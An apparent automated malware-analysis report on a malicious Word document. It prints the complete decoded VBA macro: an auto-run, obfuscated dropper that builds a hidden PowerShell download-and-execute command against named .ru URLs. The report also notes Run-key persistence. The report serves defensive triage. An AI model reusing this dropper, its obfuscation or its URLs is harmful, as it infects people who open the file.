Verdict: MALICIOUS
Risk Score: 152
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro that attempts to execute a payload. The script constructs a PowerShell command to download and execute a file from a list of URLs, including 'http://hotel-pushukino.ru/assets/images/StubV2New.exe'. The script also attempts to establish persistence by writing to the registry key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy'.
Heuristics (6)
- ClamAV: Doc.Trojan.Agent-6333895-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Agent-6333895-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `Shell Q64iQtFOf, MU6hzI`
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script: `Sub Document_Open() jGYE8Rq9i = "RfLkV4Y2VwdGlvbi5NZXNz"`
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2714 bytes |

SHA-256: db6e96e6829fd633a163a7e8fecdba889ef261aa724afeba63b72ec99e6d1008

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 49 of 94 identifiers look randomly generated (e.g. 'TY3JpcHQuU2hlbGw7JHdlYmNsaWVudCA9IG5ldy1'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Auto-executes when the document is opened (OLE_VBA_DOCOPEN). The routine
' reassembles a base64 blob from many short string fragments held in
' randomly named variables, then hands it to runm().
Sub Document_Open()
    jGYE8Rq9i = "RfLkV4Y2VwdGlvbi5NZXNz"
    Pn2zJ5pCo = "YWdlO31"
    JgpmiWCjw = "9"
    P5LsN = jGYE8Rq9i & Pn2zJ5pCo & JgpmiWCjw
    opjF3bo = "mMucnUvYXNzZXRzL2ltYWdlcy9TdHViVjJOZXcuZXhlLGh0dHA6Ly"
    L5SNfsuKw = "9pZnRicm9rZXIucnUvYXNzZXRzL2ltYWdlcy9TdHViVjJOZ"
    M81vnSYdA = "XcuZXhlLGh0dHA6Ly9p"
    xCxW9b = opjF3bo & L5SNfsuKw & M81vnSYdA
    vGBopg5t = "cG93ZXJzaGVsbCAtV2luZG93U3R5bGUgSGlkZGVuICR3c"
    X7eTI4g = "2NyaXB0ID0gbmV3LW9iamVjdCAtQ29tT2JqZWN0IFd"
    yvyWB = vGBopg5t & X7eTI4g
    mwvZ2Y7Sc = "skd2ViY2xpZW50LkRvd25sb2FkRmlsZSgkdXJsLlRv"
    a5yzhMY86 = "U3RyaW5nK"
    sDTqJ60na = "CksICRwYXRoKTtTdGFydC1Qcm9jZXNzICRwYXRoO2JyZWFrO31jY"
    FN3WUZ = "XRjaHt3cml0ZS1ob3N0IC"
    AGxAn = mwvZ2Y7Sc & a5yzhMY86 & sDTqJ60na & FN3WUZ
    UG1V3B4ba = "TY3JpcHQuU2hlbGw7JHdlYmNsaWVudCA9IG5ldy1vYmplY3QgU3lzdGVtLk5ldC5"
    RaXAGM2 = "XZWJDbGllbnQ7JHJhbmRvbSA9IG5ldy1vYmplY3QgcmFuZG"
    jUgvW5 = "9tOyR1cmxz"
    bDgZJ = UG1V3B4ba & RaXAGM2 & jUgvW5
    InfUa = "ID0gJ2h0dHA6Ly9ob3RlbC1wdXNoa2luby5ydS9hc3Nld"
    gJbKui6Xa = "HM"
    GCYftc = "vaW1hZ2VzL1N0dWJWMk5ldy5leGUsaHR0cDovL2ktY"
    sWrx7DaK = InfUa & gJbKui6Xa & GCYftc
    VnpBR5FY = "zNik7JHBhdGggPSAkZW52OnRlbXA"
    sLYqTZVDP = "gKyAnXCcgKyAkbmFtZSArICcuZXhl"
    ciF6HZgrl = "Jztmb3JlYWNoKCR1cmwgaW4gJHVybHMpe3RyeX"
    nPrBSF = VnpBR5FY & sLYqTZVDP & ciF6HZgrl
    Aq4wIGL5 = "1YlYyTmV3LmV4ZSc"
    K2JOQlP4f = "uU3BsaXQoJywnKTskbmFtZSA"
    rsVSLF3T = "9ICRyYW5kb20ubmV4dCgxLCA2NTU"
    DfxlBop0W = Aq4wIGL5 & K2JOQlP4f & rsVSLF3T
    MCgqDbe = "bXBsYWRlbnQucnUvYXNzZXRzL2l"
    erg5ehGHI = "tYWdlcy9TdHViVjJOZXcuZXhlLGh0"
    jEn83o1 = "dHA6Ly9pbXB1bHNhdmlhLnJ1L2Fzc2V0cy9pbWFnZXMvU3R"
    CRFVrhd = MCgqDbe & erg5ehGHI & jEn83o1
    ' Fragments are concatenated out of source order to defeat simple string scanning.
    V7JnXW = yvyWB & bDgZJ & sWrx7DaK & xCxW9b & CRFVrhd & DfxlBop0W & nPrBSF & AGxAn & P5LsN
    Call runm(V7JnXW)
End Sub

Attribute VB_Name = "o79Jl"
' Decodes the blob and passes it to the module that performs the Shell call.
Sub runm(FgrBzW5hp)
    KowDvZqH = dnfpbKR(FgrBzW5hp)
    yeE0j9u. _
        titdg KowDvZqH, 0
End Sub

Attribute VB_Name = "UKmsWT"
' Base64 decode via an MSXML2.DOMDocument element with dataType "bin.base64";
' nodeTypedValue returns the decoded bytes.
Function dnfpbKR(gsy3wCR) As String
    Set jnbEH2l5B = New MSXML2.DOMDocument
    Set IwdnHaN = jnbEH2l5B.createElement(E93W28PJ)
    With IwdnHaN
        .dataType = "bin.base64"
        .text = gsy3wCR
        dnfpbKR = IwdnHaN.nodeTypedValue
        hxsMZ8 = 21808 / 376   ' dead arithmetic; has no effect on the result
    End With
    Set IwdnHaN = Nothing
    Set jnbEH2l5B = Nothing
End Function

Attribute VB_Name = "yeE0j9u"
Public Const E93W28PJ = "BASE64"
' StrConv(..., 64) is vbUnicode; the decoded bytes become the command string
' passed to Shell (OLE_VBA_SHELL). Window style 0 is vbHide.
Public Sub titdg(ojCHIa, MU6hzI)
    Dim Q64iQtFOf As String
    Q64iQtFOf = StrConv(ojCHIa, 64)
    Shell Q64iQtFOf, MU6hzI
End Sub
```